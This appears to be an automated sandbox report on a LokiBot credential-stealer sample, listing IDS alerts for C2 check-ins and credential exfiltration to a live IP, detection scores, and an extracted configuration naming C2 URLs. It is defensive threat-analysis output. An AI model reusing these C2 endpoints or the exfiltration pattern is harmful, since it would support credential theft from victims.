2025-01-11T07:45:17.828451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:18.943087+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:19.816581+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:20.695534+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:21.906791+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:22.801196+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:23.654933+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:24.666068+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:25.549065+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:26.431338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:27.499770+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:28.375675+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.280517+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:30.122846+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.991478+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:31.859651+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:32.741029+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:33.607086+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:34.487775+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:35.345550+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:36.525051+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:37.400062+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:38.410807+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:39.302388+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.165796+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:41.015055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:42.032602+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.904942+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:43.761690+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:44.721124+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:45.593770+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:46.450873+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:47.341627+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.223334+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:49.103767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.999889+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:50.897746+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:51.767772+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:52.610435+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:53.849528+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:54.733799+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:55.638595+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:56.514453+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:57.364760+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:58.382542+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.299658+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:46:00.145771+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.982126+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:01.873444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:02.873702+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:03.722760+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:04.607701+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:05.489996+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:06.353603+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.255437+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:08.138322+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:09.033339+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.910608+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:10.798044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:11.690985+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:12.563647+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:13.437852+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:14.311717+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.196451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:16.066977+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.947180+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:17.795814+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:18.795869+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:19.678030+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:20.545406+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:21.450794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:22.498284+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:23.372578+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.220617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:25.095420+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.958653+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50112	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://94.156.177.41/simple/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: YvVDV4cbjy.exe	Virustotal: Detection: 74%			Perma Link
Source: YvVDV4cbjy.exe	ReversingLabs: Detection: 79%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: YvVDV4cbjy.exe

Joe Sandbox ML: detected

Source: YvVDV4cbjy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: YvVDV4cbjy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49862 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49719 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 94.156.177.41:80
